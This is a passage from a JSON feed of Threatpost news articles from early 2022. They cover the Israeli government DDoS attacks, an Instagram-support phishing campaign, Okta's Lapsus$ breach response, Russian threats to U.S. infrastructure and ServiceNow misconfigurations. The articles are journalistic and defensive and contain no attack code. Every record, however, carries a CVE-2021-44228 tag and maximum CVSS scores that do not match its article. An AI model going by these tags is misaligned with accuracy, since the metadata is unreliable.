The incident led the Directorate to briefly declare a state of emergency, while sources said the [cyberattack was the largest ever against Israel](<https://www.haaretz.com/israel-news/.premium-israeli-government-sites-crash-in-cyberattack-1.10674433>).\n\n\u201cUpdate: In the last few hours, a [DDoS] attack has been identified on a communications provider which, as a result, has for a short time prevented access to a number of sites, including government sites,\u201d the Cyber Israel account tweeted.\n\nHaaretz reported the sites for the Israeli departments of interior, health, justice, welfare and even the Prime Minister\u2019s office were taken offline (services are now restored). A source identified by Haaretz as a member of the \u201cdefense establishment\u201d noted the size of the attack, adding that only a nation-state-backed threat actor could have pulled off such a large-scale attack.\n\nInternet tracker NetBlocks reported that the attacks were launched against Israeli telecom providers Bezeq and Cellcom.\n\n> \u2139\ufe0f Update: The [#Israel](<https://twitter.com/hashtag/Israel?src=hash&ref_src=twsrc%5Etfw>) Government Network (Tehila Project, AS8867) which hosts several gov\u00b7il website domains has become unreachable internationally. 
Users within the country remain able to access the platforms.\n> \n> \ud83d\udcf0 Further Reading: <https://t.co/zgeodgMzk1> [pic.twitter.com/YAHSf63Wun](<https://t.co/YAHSf63Wun>)\n> \n> \u2014 NetBlocks (@netblocks) [March 14, 2022](<https://twitter.com/netblocks/status/1503465330315825152?ref_src=twsrc%5Etfw>)\n\nMeanwhile, cybersecurity watchers and experts suspect Iran was behind the attack.\n\n\u201cThe recent DDoS attacks against Israel have been attributed to actors aligned with Iran, highlighting the significant ongoing tensions between the two countries,\u201d Chris Morgan, senior cyber-threat intelligence analyst with Digital Shadows, told Threatpost by email.\n\nThe timing indicates the DDoS attacks were in retaliation for Israel\u2019s attempt to breach Iran\u2019s nuclear infrastructure, Morgan explained.\n\n\u201cThe attacks occurred just hours after Iranian state television announced that its security forces had reportedly stopped an attempted sabotage of nuclear centrifuges against a nuclear power plant in Fordow,\u201d he said. \u201cAttacking nuclear centrifuges draws parallels to previous cyberattacks against Iran, notably the Stuxnet incident of 2010; some have suggested this destructive malware attack was the work of Israel\u2019s intelligence services.\u201d\n\n## **Israel, Uniquely Prepared to Defend Against Cyberattacks**\n\nIsrael is known to have engaged in covert cybersecurity operations across the globe, Jennifer Tisdale, CEO of GRIMM, told Threatpost \u2014 including developing the [Stuxnet worm](<https://threatpost.com/stuxnet-apts-gossip-girl/143595/>) that was deployed against Iran. As a result, the country is prepared to respond to attacks on its own systems, she said, adding that it\u2019s an approach the U.S. government should adopt.\n\n\u201cToday\u2019s broad cyberattack is just another Tuesday in Israel, for the most part,\u201d Tisdale said. 
\u201cIsrael\u2019s approach to cybersecurity offers some solid takeaways the U.S. government could and should embrace.\u201d\n\nIt starts with smart government policymaking, she added.\n\n\u201cFirst, Israel has developed cybersecurity public policy that is both robust and nimble,\u201d Tisdale said. \u201cThey have prioritized government funding specific to cyberattack mitigation, preparation and response to protect against other governments or private sector incidents.\u201d\n\nAlso, \u201ccybercriminals also face stiff consequences for their actions against Israeli interests,\u201d Tisdale said.\n\n\u201cIsrael has also embraced an attacker-oriented response strategy and has developed a practice for holding people and organizations accountable with both national and international law enforcement,\u201d she added. \u201cThough we could debate what an appropriate response should look and feel like, I believe we can all agree that having a cyber-response plan and accountability plan to protect U.S. critical infrastructure, government networks and communication systems should be prioritized.\u201d\n\nThough the size of the attack is notable, DDoS attacks in general are common against nations and should be anticipated, Netenrich principal threat hunter John Bambenek told Threatpost.\n\n\u201cUltimately, DDoS attacks remain a technique to knock critical infrastructure, such as government websites, offline,\u201d Bambenek said. \u201cThe technique is popular among activists because it doesn\u2019t require much in the way of prep work to pull off. Government targets, such as the Israeli government, are common.\u201d\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-15T19:47:39", "type": "threatpost", "title": "Cyberattacks Against Israeli Government Sites: 'Largest in the Country\u2019s History'", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-15T19:47:39", "id": "THREATPOST:03FC9E97BBF9730C5990E8A220DD5E9A", "href": "https://threatpost.com/cyberattacks-israeli-government-sites-largest/178927/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T14:21:33", "description": "A phishing campaign used the guise of Instagram technical support to steal login credentials from employees of a prominent U.S. 
life insurance company headquartered in New York, researchers have revealed.\n\nAccording to a [report](<https://www.armorblox.com/blog/the-email-bait-and-phish-instagram-phishing-attack>) published by Armorblox on Wednesday, the attack combined brand impersonation with social engineering and managed to bypass Google\u2019s email security by using a valid domain name, eventually reaching the mailboxes of hundreds of employees.\n\n## Scam Looked Identical to Instagram\n\nThe attack began with a simple email. Disguised as an alert from Instagram\u2019s technical support team, it indicated that the recipient\u2019s account was under threat of deactivation. The intention, according to the report, was \u201cto create a sense of urgency while instilling trust in the sender.\u201d\n\n\u201cYou have been reported for sharing fake content in your membership,\u201d read the body of the email. \u201cYou must verify your membership. If you can\u2019t verify within 24 hours your membership will be permanently deleted from our servers.\u201d This message fostered a sense of urgency, to goad the unsuspecting into clicking on a malicious \u201caccount verify\u201d link. Targets who did so ended up on a landing page, where they were asked to submit their Instagram account login information. That information would go straight to the malicious actor, of course, unbeknownst to the target themselves.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/16092345/instagram-phishing-email-e1647437038569.png>)\n\nInstagram phishing email. Source: Armorblox.\n\nAt no point did any of these steps \u201clook to be malicious to the common end user, and every touch point, from the email to the account verification form, include Meta and Instagram branding and logos,\u201d the researchers noted.\n\nThe attackers certainly left clues along the way. They made grammar, spelling and capitalization errors in the body of the phishing email. 
In the sender field, the \u201cI\u201d in \u201cInstagram Support\u201d was, in fact, an \u201cL.\u201d And the email domain itself \u2013 membershipform@outlook.com.tr \u2013 clearly didn\u2019t come from Instagram.\n\nStill, the domain itself was perfectly legitimate \u2013 allowing it to bypass traditional spam filters \u2013 and, the researchers explained, \u201cthe sender crafted a long email address, meaning that many mobile users would only see the characters before the \u2018@\u2019 sign, which in this case is \u2018membershipform\u2019 \u2013 one that would not raise suspicion.\u201d\n\n## How to Defend Yourself\n\nJust a few weeks ago, cyberattackers [impersonated](<https://threatpost.com/cyberattackers-docusign-steal-microsoft-outlook-logins/178613/>) the DocuSign e-signature software to steal Microsoft account credentials from a U.S. payment solutions company. In that case, too, hundreds of employees were exposed as a result of dutiful brand impersonation, clever social engineering and a valid email domain that bypassed traditional security measures.\n\nPerhaps these two campaigns were identified and stopped, but what about the next one? Or the one after that? Or other campaigns we haven\u2019t heard about, because they weren\u2019t successfully identified by a security team?\n\nArmorblox\u2019s report suggested four main areas where employees can focus to protect themselves against phishing.\n\n * **Avoid opening emails that you are not expecting**\n * **Augment native email security to stop socially engineered attacks**\n * **Watch out for targeted attacks**\n * **Follow multi-factor authentication and password management best practices**\n\n\u201cTo protect against these attacks, employees should be educated on the value of their email accounts,\u201d wrote Erich Kron of KnowBe4, via email. 
\u201cIn addition, employees need to understand the danger of reusing passwords and using simple passwords to secure accounts both personally and within the organization.\u201d\n\nEven one employee\u2019s slip-up can cause major problems across an organization, followed by other organizations along a supply chain. \u201cTake caution when using business credentials to login across multiple apps,\u201d wrote Armorblox researchers, \u201cespecially social apps that cross over into personal use. The convenience may be tempting; however, it only takes one time for both your sensitive personal and business data to risk exposure.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-16T04:00:47", "type": "threatpost", "title": "Phony Instagram \u2018Support Staff\u2019 Emails Hit Insurance Company", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-16T04:00:47", "id": "THREATPOST:9374ECD9CCFC891FC2F3B85DF0905A1C", "href": "https://threatpost.com/phony-instagram-support-staff-emails-hit-insurance-company/178929/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-28T18:36:10", "description": "On Friday, Okta \u2013 the authentication firm-cum-Lapsus$-victim \u2013 admitted that it \u201cmade a mistake\u201d in handling the [recently revealed](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>) Lapsus$ attack. \n\nThe mistake: trusting that a service provider had told Okta everything it needed to know about an \u201cunsuccessful\u201d account takeover (ATO) at that provider, and that the attackers wouldn\u2019t reach their tentacles back to drag in Okta or its customers. \n\nWrong-o, it turned out: About a week ago, Lapsus$ bragged about having gotten itself \u201csuperuser/admin\u201d access to Okta\u2019s internal systems, gleefully posting proof and poking fun at Okta for its denials that the Jan. 20 attack had been successful. \n\nIn an [FAQ](<https://support.okta.com/help/s/article/Frequently-Asked-Questions-Regarding-January-2022-Compromise?language=en_US>) published on Friday, Okta offered a full timeline of the incident, which started on Jan. 20 when the company learned that \u201ca new factor was added to a Sitel customer support engineer\u2019s Okta account.\u201d\n\n## What Happened at Sitel\n\nThe target of the Jan. 20 attack was Sykes Enterprises, which Sitel acquired in September 2021. Okta has referred to the company as Sitel \u2013 a third-party vendor that helps Okta out on the customer-support front \u2013 in its updates and FAQ. 
\n\nThe threat actor failed in its attempt to add a new factor \u2013 a password \u2013 to one of Sitel\u2019s customer support engineer\u2019s Okta account. Okta Security had received an alert that a new factor was added to a Sitel employee\u2019s Okta account from a new location and that the target didn\u2019t accept a multifactor authentication (MFA) challenge, which Okta said blocked the intruder\u2019s access to the Okta account. \n\nNonetheless, \u201cout of an abundance of caution,\u201d the next day \u2013 Jan. 21 \u2013 Okta reset the account and notified Sitel. On the same day, Okta Security shared indicators of compromise (IOC) with Sitel, which told Okta that it had retained outside support from \u201ca leading forensic firm.\u201d\n\nAccording to the full report that Sitel commissioned, the threat actor had access to Sitel\u2019s systems for a five-day window, from Jan. 16-21: dates that back up the screenshots that Lapsus$ posted on March 21. \n\nDuring the five-day window wherein it had access to Sitel, the attacker\u2019s only action was the attempted password reset.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/28140124/Screen-Shot-2022-03-28-at-1.59.44-PM-1-e1648490538671.png>)\n\nTimeline of Okta hack. Source: Okta.\n\n## How Okta Screwed Up\n\nAs far as why Okta didn\u2019t notify customers when it learned of the ATO attack in January, it acknowledged on Friday that \u201cwe made a mistake.\u201d \n\n\u201cSitel is our service provider for which we are ultimately responsible,\u201d it admitted in the Friday FAQ. \n\nYou can\u2019t know what you don\u2019t know, though: \u201cIn January, we did not know the extent of the Sitel issue \u2013 only that we detected and prevented an account takeover attempt and that Sitel had retained a third party forensic firm to investigate,\u201d Okta said. \u201cAt that time, we didn\u2019t recognize that there was a risk to Okta and our customers. 
We should have more actively and forcefully compelled information from Sitel.\u201d\n\nCoulda, woulda, shoulda, it said: \u201cIn light of the evidence that we have gathered in the last week, it is clear that we would have made a different decision if we had been in possession of all of the facts that we have today.\u201d\n\nIt must be a painful mea culpa: Okta\u2019s share price had dropped nearly 15 percent as of Friday. As the Wall Street Journal [reported](<https://www.wsj.com/articles/okta-faces-long-road-back-11648211400>), that\u2019s a common reaction after major cyberattacks, such as those at SolarWinds, Mimecast and Mandiant, all of which saw shares slide after they reported their own incidents. \n\nThe WSJ\u2019s headlines say it all: \u201cIdentity-management company has strong market position, but business impact of recent hack won\u2019t be clear for a while,\u201d the business daily said on Friday, predicting that \u201cOkta Faces Long Road Back.\u201d \n\n## Potential Extent of Compromise\n\nIn its Friday FAQ, Okta said that, as detailed in [its blog](<https://www.okta.com/blog/2022/03/oktas-investigation-of-the-january-2022-compromise/>), the company has already identified and contacted 366 potentially affected customers. The Okta service itself was not breached, it said: \u201cThere is no impact to Auth0 or AtSpoke customers, and there is no impact to HIPAA and FedRAMP customers.\u201d\n\nAs such, customers don\u2019t have to reset passwords, Okta said: \u201cWe are confident in our conclusions that the Okta service has not been breached and there are no corrective actions that need to be taken by our customers.\n\n\u201cWe are confident in this conclusion because Sitel (and therefore the threat actor who only had the access that Sitel had) was unable to create or delete users, or download customer databases.\u201d\n\nThat lack of access is by design, Okta explained. 
\u201cIn assessing the potential extent of the compromise, it is important to remember that by design, Sitel\u2019s support engineers have limited access. They are unable to create or delete users, or download customer databases. Support engineers are able to facilitate the resetting of passwords and multi-factor authentication factors for users, but are unable to choose those passwords. In other words, an individual with this level of access could repeatedly trigger a password reset for users, but would not be able to log in to the service.\u201d\n\nBesides its attack on Okta, the precocious Lapsus$ gang \u2013 a group of data extortionists potentially [thinned out](<https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/>) by London police having collared seven suspected members last week \u2013 also posted some of Microsoft\u2019s source code and data about internal projects and systems around the same time as it shared Okta screenshots.\n\n## How Much Should We Blame Okta?\n\nSecurity specialists aren\u2019t jumping to blame Okta for its admitted \u201cmistake.\u201d The thinking: There but for the grace of God go us. \n\nAfter all, ATOs are common. How should an organization know which ones to consider as worthy of close inspection, and when should they follow up with a deeper dive to ensure the attempt wasn\u2019t successful? \n\nSounil Yu, chief information security officer at JupiterOne \u2013 provider of cyber asset management and governance technology \u2013 told Threatpost on Monday that these intrusions (or, rather, attempted intrusions, as the case may be) occur regularly, but the \u201cvast majority\u201d are beaten back before they have a serious impact or lead to further incidents.\n\n\u201cIt\u2019s easy in hindsight to understand the true severity of an incident, but hard in the present time,\u201d he said via email. 
\n\nChris Morgan, senior cyber threat intelligence analyst at digital risk protection firm Digital Shadows, explained that ATOs are \u201cincredibly common\u201d due to a combination of the effectiveness and availability of brute-force cracking tools and threat actors\u2019 ability to sell stolen accounts on cybercriminal forums. \n\n## What Should Trigger a Report?\n\nThe question of whether certain incidents are material enough to report \u201ccan be more art than science,\u201d Yu said. But the Okta case will probably cause many organizations to reconsider what ratings and thresholds they\u2019re applying to such incidents, he surmised, \u201cso that we are not seen as negligent in meeting our reporting obligations.\u201d\n\nKnowing when to conduct a more robust investigation depends on what facts are uncovered during the incident management process, along with the risk associated with the targeted account, Morgan said via email. \u201cAn account with significant privileges should be treated with a higher priority than those that [have] limited functionality,\u201d he advised.\n\nInitial triage of ATO attacks aims to identify key facts about what activity the account has been involved in, to accurately determine the risk and next steps, Morgan said. \u201cThis is typically done by checking authentication logs and observing login activity and includes spotting whether the account has attempted to login to additional services, changed any passwords, or downloaded external material,\u201d he continued. \u201cIt also includes activity that may have an impact on the overall risk, like whether the account has accessed sensitive data or attempted to establish persistence.\u201d\n\n## No \u2018God-like Access\u2019 Was Gained\n\nWhen the Okta breach first came to light, there was concern about a \u201csuperuser\u201d app pictured in Lapsus$ screenshots. Okta clarified on Friday that this was no \u201cSuper Admin\u201d account, as had been feared initially. 
Rather, it\u2019s an in-house application \u2013 known as SuperUser or SU \u2013 used by support staff to handle most queries. \n\n\u201cThis does not provide \u2018god-like access\u2019 to all its users,\u201d Okta Chief Security Officer David Bradbury explained. \u201cThis is an application built with least privilege in mind to ensure that support engineers are granted only the specific access they require to perform their roles.\u201d\n\nSpecifically, SuperUser engineers can\u2019t create or delete users or download customer databases. \n\nWhat SuperUsers can do: \u201cSupport engineers do have access to limited data \u2013 for example, Jira tickets and lists of users \u2013 that were seen in the screenshots,\u201d Bradbury clarified. \u201cSupport engineers are also able to facilitate the resetting of passwords and MFA factors for users, but are unable to obtain those passwords.\u201d\n\nThe fact that the Sitel account Lapsus$ took over was reportedly built with the principle of least privilege in mind \u201cshould have minimized the data and services that Lapsus$ were able to view,\u201d Morgan said, in response to Threatpost asking what Okta did right. \n\n\u201cOkta should also be praised for how quickly they identified and worked to lock down the compromised account,\u201d he added. \n\nHowever, clearly, that timeliness didn\u2019t extend to the forensic reporting and communication of the incident, as Okta itself has now admitted. \n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-28T18:28:34", "type": "threatpost", "title": "Okta Says It Goofed in Handling the Lapsus$ Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-28T18:28:34", "id": "THREATPOST:C9D2DB62AC17B411BFFF253D149E56F2", "href": "https://threatpost.com/okta-goofed-lapsus-attack/179129/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T16:34:37", "description": "The Russian government is exploring \u201coptions for potential cyberattacks\u201d on critical infrastructure in the U.S., the White House warned on Monday, in retaliation for sanctions and other 
punishments as the war in Ukraine grinds on.\n\nOfficials said that its latest intelligence shows cyber-related \u201cpreparatory activity\u201d on the part of President Vladimir Putin\u2019s government, though White House deputy national security adviser for cyber and emerging technology Anne Neuberger emphasized that no concrete threat has been identified.\n\n\u201cTo be clear, there is no certainty there will be a cyber-incident on critical infrastructure,\u201d she told reporters [during a briefing](<https://thehill.com/homenews/administration/599072-white-house-warns-russia-prepping-possible-cyberattacks-on-us?rl=1>). She added, \u201cThere is no evidence of any specific cyberattack that we are anticipating. There is some preparatory activity that we\u2019re seeing and that is what we shared in a classified context with companies who we thought might be affected.\u201d\n\nThat observed prep work includes vulnerability scanning and website probing, she added, declining to add any specifics. She noted that officials were holding more detailed classified briefings with organizations they believe could be targeted.\n\n\u201cThe current conflict has put cybersecurity initiatives in hyperdrive, and today, industry leaders aren\u2019t just concerned about adversaries breaching critical infrastructure but losing access and control to them,\u201d Saket Modi, co-founder and CEO at Safe Security, said via email.\n\nIn tandem with the briefing, the White House released a cyber-preparedness fact sheet, and President Joe Biden [issued the following statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/>):\n\n_\u201cI have previously warned about the potential that Russia could conduct malicious cyber activity against the United States, including as a response to the unprecedented economic costs we\u2019ve imposed on Russia alongside our allies and partners. 
It\u2019s part of Russia\u2019s playbook. Today, my Administration is reiterating those warnings based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks.\u201d_\n\nThe [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/fact-sheet-act-now-to-protect-against-potential-cyberattacks/>) contains basic advice for hardening cyber-defenses, including employee awareness education; implementing multifactor authentication; keeping patching up-to-date; ensuring backups for data; turning on encryption; red-team exercises; and updating security tools.\n\n\u201cThis is a call to action and a call to responsibility for all of us,\u201d Neuberger said, again citing a \u201cpotential shift in intention\u201d by Russia.\n\n## **Organizations Are Not Prepared for Russian Attacks**\n\nJason Rebholz, CISO at Corvus Insurance, noted that basic cyber-hardening should have begun long ago.\n\n\u201cThe White House\u2019s best practices echo security fundamentals \u2013 something every organization should strive for,\u201d he said via email. \u201cFor many organizations, the time to implement was several years ago, as the frequency and severity of attacks began to escalate. Like planting a tree, the best time to secure your organization was ten years ago. The next best time is today. Organizations that have not addressed the key items and hardened their cyber-defenses are at a significantly greater risk of compromise.\u201d\n\nBeyond the basics, there are other challenges in being prepared for an onslaught from Russia\u2019s [considerable cyber-arsenal](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>), Modi said.\n\n\u201cWhile governments and businesses have started pivoting towards proactive cybersecurity, it is difficult to do so without addressing the three major challenges in cybersecurity that organizations face,\u201d he explained. 
\u201cThere are too many cybersecurity products that do not communicate with each other, and this siloed approach leads to managing cybersecurity reactively. Finally, despite increased attention on the need for a better disclosure mechanism of cyberattacks, cybersecurity communication continues to be a challenge since it often lacks a business context.\u201d\n\nMeanwhile, Danny Lopez, CEO at Glasswall, pointed out that the real risk involves zero-day exploits and other unknown threats.\n\n\u201cPutin is playing a long game. War is costly both in terms of human and economic terms. If we see a de-escalation of the situation on the ground, we are likely to see an escalation of cyber warfare,\u201d he told Threatpost. \u201cThere are no patches for [unknown zero-day] and they wreak havoc within hours, whilst the security services and technology industry tries to catch up. These are extremely dangerous to governments as well as businesses.\u201d\n\nThe bottom line is that organizations should assume that attacks are imminent, researchers concluded.\n\n\u201cIt is a confusing time that involves two nations that have historically possessed and demonstrated very good skills in the cybersecurity and cybercrime areas,\u201d noted Purandar Das, co-founder and CEO at Sotero, via email. \u201cCountries under duress have and will utilize cyberattacks as a way to retaliate and to get around sanctions. The U.S. being the face of such sanctions and a history of poorly protected infrastructure make it a tempting target. Add all this together and the warnings make a lot of sense.\u201d\n", 
"cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T16:31:18", "type": "threatpost", "title": "Russia Lays Groundwork for Cyberattacks on U.S. Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T16:31:18", "id": "THREATPOST:40A6B1288BA6177BA30307804BE630D0", "href": "https://threatpost.com/russia-cyberattacks-us-infrastructure/179037/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-09T17:12:22", "description": "Customers of the software-as-a-service (SaaS) platform ServiceNow aren\u2019t locking down access correctly, leading to nearly 70 percent of ServiceNow 
implementations tested by AppOmni being potentially exposed to the public.\n\nServiceNow is a $4.5 billion company whose software helps enterprises with their digital workflows. According to a [report](<https://appomni.com/resources/aolabs/appomni-discovers-security-misconfiguration-impacting-servicenow/>) published Wednesday by AppOmni, more than 20,000 companies use the platform.\n\nThe cause of all the exposure, the report stated, is \u201ca combination of customer-managed ServiceNow ACL configurations and overprovisioning of permissions to guest users.\u201d ACLs \u2013 access control lists \u2013 track permissions in an IT environment.\n\nExposed instances \u201cmay be utilized by a malicious actor to extract data from records,\u201d Offensive Security Researcher Aaron Costello wrote in the report.\n\n## Human Error Leads to Data Exposure\n\nOrganizations typically use role-based access controls (RBAC) to determine who can access what resources within a system. Users can see and possibly interact with whatever is relevant to them and are barred from whatever isn\u2019t.\n\nFor public-facing companies, the general public plays into the RBAC picture. \u201cOne important aspect of RBAC,\u201d the report noted, \u201cis the ability to allow public access to information within your \u2018database,\u2019 which could be a forum, online shop, customer support site, or knowledge base. The challenge is ensuring the right level of access when organizations update or customize SaaS applications or onboard new users.\u201d\n\nThus, what researchers have discovered is not so much a flaw in ServiceNow as an oversight made by customers. \u201cMisconfigurations are common across major SaaS platforms,\u201d wrote the researchers, \u201cdue to the complexity that inevitably comes with high levels of SaaS functionality, flexibility, and extensibility. 
Misconfigurations can happen during the initial implementation phase of a SaaS platform, when users or settings change, or as part of the regular cadence of SaaS updates that can impact current configurations.\u201d\n\nThe researchers found that nearly 70 percent of ServiceNow instances tested by AppOmni were misconfigured, introducing the possibility that unauthorized users could steal sensitive information from enterprises that may not even realize they\u2019re vulnerable.\n\n## Why SaaS is So Often Insecure\n\nBecause SaaS platforms are so prevalent, and so interconnected with business processes \u2013 and with one another \u2013 they tend to be some of the most high-value and highly vulnerable software in the world. They \u201chave vastly increased the attack surface,\u201d Sounil Yu, CISO and head of research at JupiterOne, [wrote](<https://threatpost.com/supply-chain-pain-and-changing-security-roles/177058/>) for Threatpost in December. \u201cThey\u2019re ripe for exploitation due to mass adoption across many organizations. This enables attackers to concentrate their efforts on a handful of SaaS providers to simultaneously impact large numbers of their customers.\u201d\n\nTypically, SaaS products come with security features like encryption and single-sign-on authentication. But features aren\u2019t enough when human error is involved. \u201cSecuring SaaS is a lot more complicated than just checking a handful of settings or enabling strong authentication for users,\u201d said Brendan O\u2019Connor, CEO and co-founder of AppOmni, in a statement.\n\nAnd so, to protect against RBAC misconfiguration, the report advised that administrators review the following:\n\n * ACLs that are absent of conditional and script based access evaluation, which have either no role, or the public role, assigned to them.\n * User criteria and the resources to which those criteria are granting access. 
Focus on any UC in which the \u201cGuest\u201d user is assigned to or contains the \u201cpublic\u201d role.\n * Resources that can be directly assigned the \u201cpublic\u201d role to grant access, or indirectly made accessible to the public through another mechanism.\n * And, finally, system properties that may dictate access to records through a provided role or list of roles.\n\nLuckily there\u2019s no fundamental, inescapable flaw in ServiceNow software. So long as admins diligently review their configurations, enterprises should remain safe from this particular harm.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T16:00:32", "type": "threatpost", "title": "Most ServiceNow Instances Misconfigured, Exposed", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T16:00:32", "id": "THREATPOST:DE6A0C7ECE2973F596891B00DC078055", "href": "https://threatpost.com/most-servicenow-instances-misconfigured-exposed/178827/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-18T15:37:38", "description": "There\u2019s a new, still-under-development, [Golang](<https://threatpost.com/golang-cryptomining-worm-speed-boost/168456/>)-based botnet called Kraken with a level of brawn that belies its youth: It\u2019s using the [SmokeLoader](<https://threatpost.com/new-loader-variant-behind-widespread-malware-attacks/146683/>) malware loader to spread like wildfire and is already raking in a tidy USD $3,000/month for its operators, researchers report.\n\nThough its name may sound familiar, Kraken has little to do with the [2008 botnet](<https://www.theregister.com/2008/04/07/kraken_botnet_menace/>) of the same name, [wrote](<https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/>) ZeroFox threat researcher Stephan Simon in a Wednesday 